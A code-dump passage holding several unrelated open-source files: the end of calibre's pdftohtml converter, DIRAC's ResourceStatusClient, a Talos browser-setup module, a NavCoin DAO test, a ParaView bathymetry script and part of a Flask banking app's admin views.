if err.errno == errno.ENOENT:
raise ConversionError(
_('Could not find pdftohtml, check it is in your PATH'))
else:
raise
while True:
try:
ret = p.wait()
break
except OSError as e:
if e.errno == errno.EINTR:
continue
else:
raise
logf.flush()
logf.close()
out = open(logf.name, 'rb').read().strip()
if ret != 0:
raise ConversionError(b'pdftohtml failed with return code: %d\n%s' % (ret, out))
if out:
print "pdftohtml log:"
print out
if not os.path.exists(index) or os.stat(index).st_size < 100:
raise DRMError()
if not as_xml:
with lopen(index, 'r+b') as i:
raw = i.read()
raw = flip_images(raw)
raw = '<!-- created by calibre\'s pdftohtml -->\n' + raw
i.seek(0)
i.truncate()
# versions of pdftohtml >= 0.20 output self closing <br> tags, this
# breaks the pdf heuristics regexps, so replace them
raw = raw.replace(b'<br/>', b'<br>')
raw = re.sub(br'<a\s+name=(\d+)', br'<a id="\1"', raw, flags=re.I)
raw = re.sub(br'<a id="(\d+)"', br'<a id="p\1"', raw, flags=re.I)
raw = re.sub(br'<a href="index.html#(\d+)"', br'<a href="#p\1"', raw, flags=re.I)
i.write(raw)
cmd = [exe, b'-f', b'1', '-l', '1', b'-xml', b'-i', b'-enc', b'UTF-8', b'-noframes', b'-p', b'-nomerge',
b'-nodrm', b'-q', b'-stdout', a(pdfsrc)]
p = popen(cmd, stdout=subprocess.PIPE)
raw = p.stdout.read().strip()
if p.wait() == 0 and raw:
parse_outline(raw, output_dir)
if isbsd:
cmd.remove(b'-nodrm')
try:
os.remove(pdfsrc)
except:
pass
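# A rough usage sketch (the paths below are hypothetical, not taken from calibre):
#
#   pdftohtml('/tmp/out', '/tmp/book.pdf', no_images=False)
#   # -> writes /tmp/out/index.html (plus any extracted images) and, when the PDF
#   #    carries an outline with enough entries, /tmp/out/toc.ncx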
def parse_outline(raw, output_dir):
from lxml import etree
from calibre.ebooks.oeb.parse_utils import RECOVER_PARSER
raw = clean_xml_chars(xml_to_unicode(raw, strip_encoding_pats=True, assume_utf8=True)[0])
outline = etree.fromstring(raw, parser=RECOVER_PARSER).xpath('(//outline)[1]')
if outline:
from calibre.ebooks.oeb.polish.toc import TOC, create_ncx
outline = outline[0]
toc = TOC()
count = [0]
def process_node(node, toc):
for child in node.iterdescendants('*'):
if child.tag == 'outline':
parent = toc.children[-1] if toc.children else toc
process_node(child, parent)
else:
page = child.get('page', '1')
toc.add(child.text, 'index.html', 'p' + page)
count[0] += 1
process_node(outline, toc)
if count[0] > 2:
root = create_ncx(toc, (lambda x:x), 'pdftohtml', 'en', 'pdftohtml')
with open(os.path.join(output_dir, 'toc.ncx'), 'wb') as f:
f.write(etree.tostring(root, pretty_print=True, with_tail=False, encoding='utf-8', xml_declaration=True))
def flip_image(img, flip):
from calibre.utils.img import flip_image, image_and_format_from_data, image_to_data
with lopen(img, 'r+b') as f:
img, fmt = image_and_format_from_data(f.read())
img = flip_image(img, horizontal=b'x' in flip, vertical=b'y' in flip)
f.seek(0), f.truncate()
f.write(image_to_data(img, fmt=fmt))
def flip_images(raw):
for match in re.finditer(b'<IMG[^>]+/?>', raw, flags=re.I):
img = match.group()
m = re.search(br'class="(x|y|xy)flip"', img)
if m is None:
continue
flip = m.group(1)
src = re.search(br'src="([^"]+)"', img)
if src is None:
continue
img = src.group(1)
if not os.path.exists(img):
continue
flip_image(img, flip)
raw = re.sub(br'<STYLE.+?</STYLE>\s*', b'', raw, flags=re.I|re.DOTALL)
return raw
| gpl-3.0 | 4,022,858,997,273,561,000 | 37.406593 | 121 | 0.558798 | false |
chaen/DIRAC | ResourceStatusSystem/Client/ResourceStatusClient.py | 1 | 14924 | ''' ResourceStatusClient
Client to interact with the ResourceStatusDB.
'''
# pylint: disable=unused-argument
__RCSID__ = '$Id$'
from DIRAC import S_OK
from DIRAC.Core.Base.Client import Client
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations
from DIRAC.FrameworkSystem.Client.NotificationClient import NotificationClient
from DIRAC.ResourceStatusSystem.Client.ResourceManagementClient import uppercase_first_letter
class ResourceStatusClient(Client):
"""
The :class:`ResourceStatusClient` class exposes the :mod:`DIRAC.ResourceStatus`
API. All functions you need are on this client.
You can use this client on this way
>>> from DIRAC.ResourceStatusSystem.Client.ResourceStatusClient import ResourceStatusClient
>>> rsClient = ResourceStatusClient()
"""
def __init__(self, **kwargs):
super(ResourceStatusClient, self).__init__(**kwargs)
self.setServer('ResourceStatus/ResourceStatus')
def _prepare(self, sendDict):
    # remove unnecessary keys generated by locals()
del sendDict['self']
del sendDict['element']
del sendDict['tableType']
# make each key name uppercase to match database column names (case sensitive)
for key, value in sendDict.items():
del sendDict[key]
if value:
sendDict.update({uppercase_first_letter(key): value})
return sendDict
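    # Illustrative example (hypothetical values): the locals() of a call such as
    # selectStatusElement('Site', 'Status', name='LCG.CERN.ch') are reduced here to
    # {'Name': 'LCG.CERN.ch'} -- None values are dropped and the surviving keys are
    # capitalised to match the (case sensitive) database column names.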
def insert(self, tableName, record):
"""
Insert a dictionary `record` as a row in table `tableName`
:param str tableName: the name of the table
    :param dict record: the record to insert, as a dictionary
:return: S_OK() || S_ERROR()
"""
return self._getRPC().insert(tableName, record)
def select(self, tableName, params=None):
"""
Select rows from the table `tableName`
:param str tableName: the name of the table
    :param dict params: dictionary of the selection parameters
:return: S_OK() || S_ERROR()
"""
if params is None:
params = {}
return self._getRPC().select(tableName, params)
def delete(self, tableName, params=None):
"""
    Delete rows from the table `tableName`
:param str tableName: the name of the table
    :param dict params: dictionary of the deletion parameters
:Returns:
S_OK() || S_ERROR()
"""
if params is None:
params = {}
return self._getRPC().delete(tableName, params)
################################################################################
# Element status methods - enjoy !
def insertStatusElement(self, element, tableType, name, statusType, status,
elementType, reason, dateEffective, lastCheckTime,
tokenOwner, tokenExpiration=None):
'''
Inserts on <element><tableType> a new row with the arguments given.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
time-stamp setting last time the status & status were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().insert(element + tableType, self._prepare(locals()))
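    # A usage sketch with hypothetical values (they are not taken from any DIRAC
    # setup) and assuming `from datetime import datetime` in the caller:
    #
    #   rsClient.insertStatusElement('Resource', 'Status', name='ce01.example.org',
    #                                statusType='all', status='Active',
    #                                elementType='ComputingElement',
    #                                reason='initial insertion',
    #                                dateEffective=datetime.utcnow(),
    #                                lastCheckTime=datetime.utcnow(),
    #                                tokenOwner='rs_svc')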
def selectStatusElement(self, element, tableType, name=None, statusType=None,
status=None, elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None, meta=None):
'''
Gets from <element><tableType> all rows that match the parameters given.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `[, string, list]`
name of the individual of class element
**statusType** - `[, string, list]`
it has to be a valid status type for the element class
**status** - `[, string, list]`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `[, string, list]`
column to distinguish between the different elements in the same element
table.
**reason** - `[, string, list]`
decision that triggered the assigned status
**dateEffective** - `[, datetime, list]`
time-stamp from which the status & status type are effective
**lastCheckTime** - `[, datetime, list]`
time-stamp setting last time the status & status were checked
**tokenOwner** - `[, string, list]`
token assigned to the site & status type
**tokenExpiration** - `[, datetime, list]`
time-stamp setting validity of token ownership
**meta** - `dict`
metadata for the mysql query. Currently it is being used only for column selection.
For example: meta = { 'columns' : [ 'Name' ] } will return only the 'Name' column.
:return: S_OK() || S_ERROR()
'''
return self._getRPC().select(element + tableType, self._prepare(locals()))
def deleteStatusElement(self, element, tableType, name=None, statusType=None,
status=None, elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None, meta=None):
'''
Deletes from <element><tableType> all rows that match the parameters given.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `[, string, list]`
name of the individual of class element
**statusType** - `[, string, list]`
it has to be a valid status type for the element class
**status** - `[, string, list]`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `[, string, list]`
column to distinguish between the different elements in the same element
table.
**reason** - `[, string, list]`
decision that triggered the assigned status
**dateEffective** - `[, datetime, list]`
time-stamp from which the status & status type are effective
**lastCheckTime** - `[, datetime, list]`
        time-stamp setting last time the status & status type were checked
**tokenOwner** - `[, string, list]`
token assigned to the site & status type
**tokenExpiration** - `[, datetime, list]`
time-stamp setting validity of token ownership
**meta** - `dict`
metadata for the mysql query
:return: S_OK() || S_ERROR()
'''
return self._getRPC().delete(element + tableType, self._prepare(locals()))
def addOrModifyStatusElement(self, element, tableType, name=None,
statusType=None, status=None,
elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None):
'''
Adds or updates-if-duplicated from <element><tableType> and also adds a log
if flag is active.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
        time-stamp setting last time the status & status type were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().addOrModify(element + tableType, self._prepare(locals()))
def modifyStatusElement(self, element, tableType, name=None, statusType=None,
status=None, elementType=None, reason=None,
dateEffective=None, lastCheckTime=None, tokenOwner=None,
tokenExpiration=None):
'''
Updates from <element><tableType> and also adds a log if flag is active.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
        time-stamp setting last time the status & status type were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().addOrModify(element + tableType, self._prepare(locals()))
def addIfNotThereStatusElement(self, element, tableType, name=None,
statusType=None, status=None,
elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None):
'''
Adds if-not-duplicated from <element><tableType> and also adds a log if flag
is active.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
        time-stamp setting last time the status & status type were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().addIfNotThere(element + tableType, self._prepare(locals()))
##############################################################################
# Protected methods - Use carefully !!
def notify(self, request, params):
''' Send notification for a given request with its params to the diracAdmin
'''
address = Operations().getValue('ResourceStatus/Notification/DebugGroup/Users')
msg = 'Matching parameters: ' + str(params)
sbj = '[NOTIFICATION] DIRAC ResourceStatusDB: ' + request + ' entry'
NotificationClient().sendMail(address, sbj, msg, address)
def _extermineStatusElement(self, element, name, keepLogs=True):
'''
Deletes from <element>Status,
<element>History
<element>Log
    all rows with the given `name`. It removes all the entries, logs, etc.
    Use with common sense!
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElements ), any of the defaults: \
`Site` | `Resource` | `Node`
**name** - `[, string, list]`
name of the individual of class element
**keepLogs** - `bool`
if active, logs are kept in the database
:return: S_OK() || S_ERROR()
'''
return self.__extermineStatusElement(element, name, keepLogs)
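  # Usage sketch (hypothetical client instance and site name):
  #   client._extermineStatusElement('Site', 'LCG.Example.org', keepLogs=True)
  # removes that site's Status and History rows while keeping its Log entries.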
def __extermineStatusElement(self, element, name, keepLogs):
'''
    This method iterates over the two ( or three ) table types - depending
on the value of keepLogs - deleting all matches of `name`.
'''
tableTypes = ['Status', 'History']
if keepLogs is False:
tableTypes.append('Log')
for table in tableTypes:
deleteQuery = self.deleteStatusElement(element, table, name=name)
if not deleteQuery['OK']:
return deleteQuery
return S_OK()
################################################################################
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF
| gpl-3.0 | -4,775,719,922,118,156,000 | 38.170604 | 94 | 0.607679 | false |
cstipkovic/spidermonkey-research | testing/talos/talos/ffsetup.py | 1 | 6208 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
Set up a browser environment before running a test.
"""
import os
import re
import tempfile
import mozfile
from mozprocess import ProcessHandler
from mozprofile.profile import Profile
from mozlog import get_proxy_logger
from talos import utils
from talos.utils import TalosError
from talos.sps_profile import SpsProfile
LOG = get_proxy_logger()
class FFSetup(object):
"""
Initialize the browser environment before running a test.
This prepares:
- the environment vars for running the test in the browser,
available via the instance member *env*.
- the profile used to run the test, available via the
instance member *profile_dir*.
- sps profiling, available via the instance member *sps_profile*
of type :class:`SpsProfile` or None if not used.
Note that the browser will be run once with the profile, to ensure
this is basically working and negate any performance noise with the
real test run (installing the profile the first time takes time).
This class should be used as a context manager::
with FFSetup(browser_config, test_config) as setup:
# setup.env is initialized, and setup.profile_dir created
pass
# here the profile is removed
"""
PROFILE_REGEX = re.compile('__metrics(.*)__metrics',
re.DOTALL | re.MULTILINE)
def __init__(self, browser_config, test_config):
self.browser_config, self.test_config = browser_config, test_config
self._tmp_dir = tempfile.mkdtemp()
self.env = None
# The profile dir must be named 'profile' because of xperf analysis
# (in etlparser.py). TODO fix that ?
self.profile_dir = os.path.join(self._tmp_dir, 'profile')
self.sps_profile = None
def _init_env(self):
self.env = dict(os.environ)
for k, v in self.browser_config['env'].iteritems():
self.env[k] = str(v)
self.env['MOZ_CRASHREPORTER_NO_REPORT'] = '1'
# for winxp e10s logging:
# https://bugzilla.mozilla.org/show_bug.cgi?id=1037445
self.env['MOZ_WIN_INHERIT_STD_HANDLES_PRE_VISTA'] = '1'
if self.browser_config['symbols_path']:
self.env['MOZ_CRASHREPORTER'] = '1'
else:
self.env['MOZ_CRASHREPORTER_DISABLE'] = '1'
self.env['MOZ_DISABLE_NONLOCAL_CONNECTIONS'] = '1'
self.env["LD_LIBRARY_PATH"] = \
os.path.dirname(self.browser_config['browser_path'])
def _init_profile(self):
preferences = dict(self.browser_config['preferences'])
if self.test_config.get('preferences'):
test_prefs = dict(
[(i, utils.parse_pref(j))
for i, j in self.test_config['preferences'].items()]
)
preferences.update(test_prefs)
# interpolate webserver value in prefs
webserver = self.browser_config['webserver']
if '://' not in webserver:
webserver = 'http://' + webserver
for name, value in preferences.items():
if type(value) is str:
value = utils.interpolate(value, webserver=webserver)
preferences[name] = value
extensions = self.browser_config['extensions'][:]
if self.test_config.get('extensions'):
extensions.append(self.test_config['extensions'])
if self.browser_config['develop'] or \
self.browser_config['branch_name'] == 'Try':
extensions = [os.path.dirname(i) for i in extensions]
profile = Profile.clone(
os.path.normpath(self.test_config['profile_path']),
self.profile_dir,
restore=False)
profile.set_preferences(preferences)
profile.addon_manager.install_addons(extensions)
def _run_profile(self):
command_args = utils.GenerateBrowserCommandLine(
self.browser_config["browser_path"],
self.browser_config["extra_args"],
self.profile_dir,
self.browser_config["init_url"]
)
def browser_log(line):
LOG.process_output(browser.pid, line)
browser = ProcessHandler(command_args, env=self.env,
processOutputLine=browser_log)
browser.run()
LOG.process_start(browser.pid, ' '.join(command_args))
try:
exit_code = browser.wait()
except KeyboardInterrupt:
browser.kill()
raise
LOG.process_exit(browser.pid, exit_code)
results_raw = '\n'.join(browser.output)
if not self.PROFILE_REGEX.search(results_raw):
LOG.info("Could not find %s in browser output"
% self.PROFILE_REGEX.pattern)
LOG.info("Raw results:%s" % results_raw)
raise TalosError("browser failed to close after being initialized")
def _init_sps_profile(self):
upload_dir = os.getenv('MOZ_UPLOAD_DIR')
if self.test_config.get('sps_profile') and not upload_dir:
LOG.critical("Profiling ignored because MOZ_UPLOAD_DIR was not"
" set")
if upload_dir and self.test_config.get('sps_profile'):
self.sps_profile = SpsProfile(upload_dir,
self.browser_config,
self.test_config)
self.sps_profile.update_env(self.env)
def clean(self):
mozfile.remove(self._tmp_dir)
if self.sps_profile:
self.sps_profile.clean()
def __enter__(self):
LOG.info('Initialising browser for %s test...'
% self.test_config['name'])
self._init_env()
self._init_profile()
try:
self._run_profile()
except:
self.clean()
raise
self._init_sps_profile()
LOG.info('Browser initialized.')
return self
def __exit__(self, type, value, tb):
self.clean()
| mpl-2.0 | 83,377,925,997,244,750 | 34.678161 | 79 | 0.597777 | false |
navcoindev/navcoin-core | qa/rpc-tests/dao/003-proposal-accepted.py | 1 | 1541 | #!/usr/bin/env python3
# Copyright (c) 2019 The Navcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import sys, os #include the parent folder so the test_framework is available
sys.path.insert(1, os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..')))
from test_framework.test_framework import NavCoinTestFramework
from test_framework.cfund_util import *
from dao.given import *
from dao.when import *
from dao.then import *
import time
class CFund003ProposalAccepted(NavCoinTestFramework):
"""It should create a proposal and the network should reject the proposal"""
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 1
def setup_network(self, split=False):
self.nodes = []
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, [["-debug=dao"],["-debug=dao"]])
def run_test(self):
self.nodes[0].staking(False)
givenIHaveActivatedTheCFund(self.nodes[0])
givenIHaveDonatedToTheCFund(self.nodes[0], 5000)
keypair = givenIHaveCreatedANewAddress(self.nodes[0])
hash = givenIHaveCreatedAProposal(self.nodes[0], keypair["pubkey"], 5000, 60*60*24, "This is my proposal")
givenIHaveVotedOnTheProposal(self.nodes[0], hash, 'yes')
whenTheVotingCycleEnds(self.nodes[0], 2)
thenTheProposalShouldBeAccepted(self.nodes[0], hash)
if __name__ == '__main__':
CFund003ProposalAccepted().main() | mit | -1,843,502,945,225,359,600 | 32.521739 | 112 | 0.709929 | false |
jasonfleming/asgs | output/paraviewBathyWSE.py | 1 | 7106 | #!/usr/bin/env python
#----------------------------------------------------------------------
# paraviewBathyWSE.py : Visualize bathy and wse simultaneously in
# Paraview.
#----------------------------------------------------------------------
# Copyright(C) 2016 Jason Fleming
#
# This file is part of the ADCIRC Surge Guidance System (ASGS).
#
# The ASGS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ASGS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the ASGS. If not, see <http://www.gnu.org/licenses/>.
#----------------------------------------------------------------------
from optparse import OptionParser
try: paraview.simple
except: from paraview.simple import *
paraview.simple._DisableFirstRenderCameraReset()
# C O M M A N D L I N E O P T I O N S
parser = OptionParser()
#parser.add_option("-i", "--interact", dest="interact", default=False,
# action="store_true", help="to enable interaction with data")
#parser.add_option("-o", "--outline", dest="outline", default=False,
# action="store_true", help="to display mesh outline")
parser.add_option("-f", "--frame", dest="frame", default=1,
help="frame to render")
parser.add_option("-m", "--magnification", dest="magnification", default=1,
help="magnification of output image (integer)")
#parser.add_option("-a", "--annotation", dest="annotation", default="null",
# help="text to place in frame")
(options, args) = parser.parse_args()
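# Example invocation (hypothetical frame/magnification values), typically run with
# ParaView's Python interpreter:
#   pvpython paraviewBathyWSE.py --frame 42 --magnification 2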
# R E A D D A T A
fort_63_nc_xmf = XDMFReader( FileName='/home/jason/projects/UNC-ASGS/2016/TableTop/08/nhcConsensus/fort.63.nc.xmf' )
fort_63_nc_xmf.PointArrays = ['sea_surface_height_above_geoid', 'BathymetricDepth']
# W A T E R S U R F A C E E L E V A T I O N
# set coloring for water surface elevation to ERDC rainbow (dark)
wseColorBar_PVLookupTable = GetLookupTableForArray( "sea_surface_height_above_geoid", 1, RGBPoints=[0.0, 0.0, 0.0, 0.423499, 0.6688949999999999, 0.0, 0.119341, 0.529244, 1.3377949999999998, 0.0, 0.238697, 0.634974, 2.00669, 0.0, 0.346853, 0.687877, 2.675585, 0.0, 0.450217, 0.718135, 3.34448, 0.0, 0.553552, 0.664836, 4.01338, 0.0, 0.651087, 0.51931, 4.682274, 0.115846, 0.724788, 0.35285, 5.3511705, 0.326772, 0.781201, 0.140185, 6.020065, 0.522759, 0.79852, 0.0284581, 6.688965, 0.703166, 0.788678, 0.00885023, 7.35786, 0.845121, 0.751141, 0.0, 8.026755, 0.955734, 0.690822, 0.0, 8.69565, 0.995407, 0.56791, 0.0618448, 9.36455, 0.987716, 0.403403, 0.164858, 10.0, 0.980407, 0.247105, 0.262699], VectorMode='Magnitude', NanColor=[0.498039, 0.0, 0.0], ColorSpace = 'Lab', ScalarRangeInitialized=1.0 )
wseColorBar_PiecewiseFunction = CreatePiecewiseFunction( Points=[0.0, 0.0, 0.5, 0.0, 10.0, 1.0, 0.5, 0.0] )
wseColorBar_PVLookupTable.ScalarOpacityFunction = wseColorBar_PiecewiseFunction
wseColorBar_PVLookupTable.LockScalarRange = 1
# use threshold filter to eliminate the -99999 values from the water
# surface elevation data
SetActiveSource(fort_63_nc_xmf) # start building the pipeline from the reader
Threshold1 = Threshold()
Threshold1.ThresholdRange = [-99998.0, 100.0]
Threshold1.Scalars = ['POINTS', 'sea_surface_height_above_geoid']
WarpByScalar1 = WarpByScalar()
WarpByScalar1.Scalars = ['POINTS', 'sea_surface_height_above_geoid']
WarpByScalar1.ScaleFactor = 0.0002
DataRepresentation1 = Show()
DataRepresentation1.ColorArrayName = ('POINT_DATA', 'sea_surface_height_above_geoid')
DataRepresentation1.ScalarOpacityFunction = wseColorBar_PiecewiseFunction
DataRepresentation1.LookupTable = wseColorBar_PVLookupTable
# B A T H Y M E T R Y / T O P O G R A P H Y
# need to remove dry areas that are below msl from the visualization
# otherwise they will show up blue in the visualization and look like
# they are underwater
SetActiveSource(fort_63_nc_xmf) # start building the pipeline from the reader
Threshold2 = Threshold()
Threshold2.Scalars = ['POINTS', 'BathymetricDepth']
Threshold2.ThresholdRange = [-100.0, 0.0]
# use Casey's bathy/topo color bar
bathyColorBar_PVLookupTable = GetLookupTableForArray( "BathymetricDepth", 1, RGBPoints=[-20.0, 0.0, 0.250004, 0.0, -10.0, 0.0, 0.500008, 0.0, -5.0, 0.0, 0.629999, 0.0, -2.0, 0.0, 0.764996, 0.0, -1.0, 0.0, 0.8, 0.0500038, -0.5, 0.0, 0.850004, 0.100008, -0.2, 0.0, 0.900008, 0.149996, -0.1, 0.0, 0.949996, 0.2, 0.0, 0.0, 1.0, 1.0, 0.0001, 1.0, 1.0, 1.0, 0.1, 1.0, 1.0, 1.0, 0.2, 0.0, 1.0, 1.0, 0.5, 0.0, 0.500008, 1.0, 1.0, 0.0, 0.4, 1.0, 2.0, 0.0, 0.299992, 1.0, 5.0, 0.0, 0.2, 1.0, 10.0, 0.0, 0.100008, 1.0, 20.0, 0.0, 0.00999466, 1.0, 50.0, 0.0, 0.0, 1.0, 100.0, 0.0, 0.0, 0.510002], VectorMode='Magnitude', NanColor=[0.498039, 0.0, 0.0], ColorSpace='RGB', ScalarRangeInitialized=1.0 )
bathyColorBar_PiecewiseFunction = CreatePiecewiseFunction( Points=[-66.632401, 0.0, 0.5, 0.0, 0.0, 1.0, 0.5, 0.0] )
bathyColorBar_PVLookupTable.ScalarOpacityFunction = bathyColorBar_PiecewiseFunction
WarpByScalar2 = WarpByScalar()
WarpByScalar2.Scalars = ['POINTS', 'BathymetricDepth']
WarpByScalar2.ScaleFactor = -0.0002
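# Note: ADCIRC's BathymetricDepth is positive downward, so the negative scale factor
# warps the above-datum terrain kept by Threshold2 upward, using the same vertical
# exaggeration as the water surface warp above.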
DataRepresentation5 = Show()
DataRepresentation5.EdgeColor = [0.0, 0.0, 0.5000076295109483]
DataRepresentation5.SelectionPointFieldDataArrayName = 'BathymetricDepth'
DataRepresentation5.ScalarOpacityFunction = bathyColorBar_PiecewiseFunction
DataRepresentation5.ColorArrayName = ('POINT_DATA', 'BathymetricDepth')
DataRepresentation5.ScalarOpacityUnitDistance = 0.11216901957450816
DataRepresentation5.LookupTable = bathyColorBar_PVLookupTable
DataRepresentation5.ScaleFactor = 1.2353294372558594
# T E X T A N N O T A T I O N
#Text1 = Text()
#Text1.Text = 'Hurricane Zack Exercise\nNHC Official Forecast Track\nAdvisory 8'
#DataRepresentation6 = Show()
RenderView1 = GetRenderView()
RenderView1.CameraClippingRange = [102.0, 105.0]
RenderView1.CameraFocalPoint = [-90.5, 29.5, 0.0]
RenderView1.CenterOfRotation = [-90.5, 29.5, 0.0]
RenderView1.CameraParallelScale = 1.6
RenderView1.InteractionMode = '2D'
RenderView1.CameraPosition = [-90.5, 29.5, 103.0]
RenderView1.CenterAxesVisibility = 0 # turn off axes that show center of rotation
#save screenshot
view = GetActiveView()
view.Background = [0.35,0.36,0.45] # dark gray
tsteps = fort_63_nc_xmf.TimestepValues
annTime = AnnotateTimeFilter(fort_63_nc_xmf)
# Show the filter
Show(annTime)
view.ViewTime = tsteps[int(options.frame)]
Render()
frame_file = 'test_%03d.png' % int(options.frame)
WriteImage(frame_file,Magnification=int(options.magnification))
#view.ViewTime = tsteps[100]
#Render()
#WriteImage("newtest3.png",Magnification=4)
# Save the animation to an avi file
#AnimateReader(fort_63_nc_xmf, filename="movie.avi")
| gpl-3.0 | -6,397,047,685,143,120,000 | 53.661538 | 802 | 0.698987 | false |
Pantynopants/DBMS_BANK | app/admin/views.py | 1 | 6292 | # -*- coding=utf-8 -*-
from flask import render_template, flash, redirect, url_for, request, make_response, current_app
from flask_login import login_required, current_user, login_user, logout_user
from forms import *
from ..models import *
from .. import db
from ..utils import db_utils
from . import admin
@admin.route('/')
def index():
# print("1")
return render_template('admin/index.html')
@admin.route('/login', methods=['GET', 'POST'])
def login():
"""
    if a cookie exists, log in without the form
    else give a random one
"""
form = LoginForm()
if form.validate_on_submit():
# print(form.username.data)
user = User.User.get_user_by_username(form.username.data)
if user is not None and user.verify_password(form.password.data):
login_user(user)
return redirect(request.args.get('next') or url_for('admin.index'))
else:
            flash(u'user does not exist')
# print user, form.password.data
        flash(u'login failed')
return render_template('admin/login.html', form=form)
@admin.route('/register', methods=['GET', 'POST'])
def register():
# register_key = 'zhucema'
form = RegistrationForm()
if form.validate_on_submit() and not User.User.isUserExist(form.username.data):
# if form.registerkey.data != register_key:
        # flash(u'Registration key does not match, please go back and try again.')
# return redirect(url_for('admin.register'))
# else:
if form.password.data != form.password2.data:
            flash(u'The two passwords do not match')
return redirect(url_for('admin.register'))
else:
user = User.User()
user.username=form.username.data
user.real_name=form.real_name.data
user.password=form.password.data
db_utils.commit_data(db, user)
# print(user.username)
            flash(u'You have registered successfully')
return redirect(url_for('admin.login'))
return render_template('admin/register.html', form=form)
@admin.route('/logout')
@login_required
def logout():
logout_user()
    flash(u'You have logged out of the system')
redirect_to_index = redirect(url_for('main.index'))
response = current_app.make_response(redirect_to_index )
response.set_cookie('USERID',value="GUEST")
return response
@admin.route('/transaction', methods=['GET', 'POST'])
@login_required
def transaction_modify():
user = db.session.query(User.User).filter(User.User.id == current_user.get_id()).first()
# print(a)
if user:
wallet = user.wallet
trans_instance = user.transaction
alist = user.transaction
# print(user.username)
# print(alist)
else:
flash("ERROR: can not find user")
redirect(url_for('admin.index'))
form = PostTransactionForm()
if form.validate_on_submit():
if form.payment.data != None :
if form.payment.data == 'wallet':
if form.wallet.data != None and form.wallet.data != 0:
user.pay_trans(trans=trans_instance, number = form.wallet.data)
# else:
# flash(u'nothing in wallet! use bank card instead!')
# redirect(url_for('admin.transaction'))
elif form.payment.data == 'bank_card':
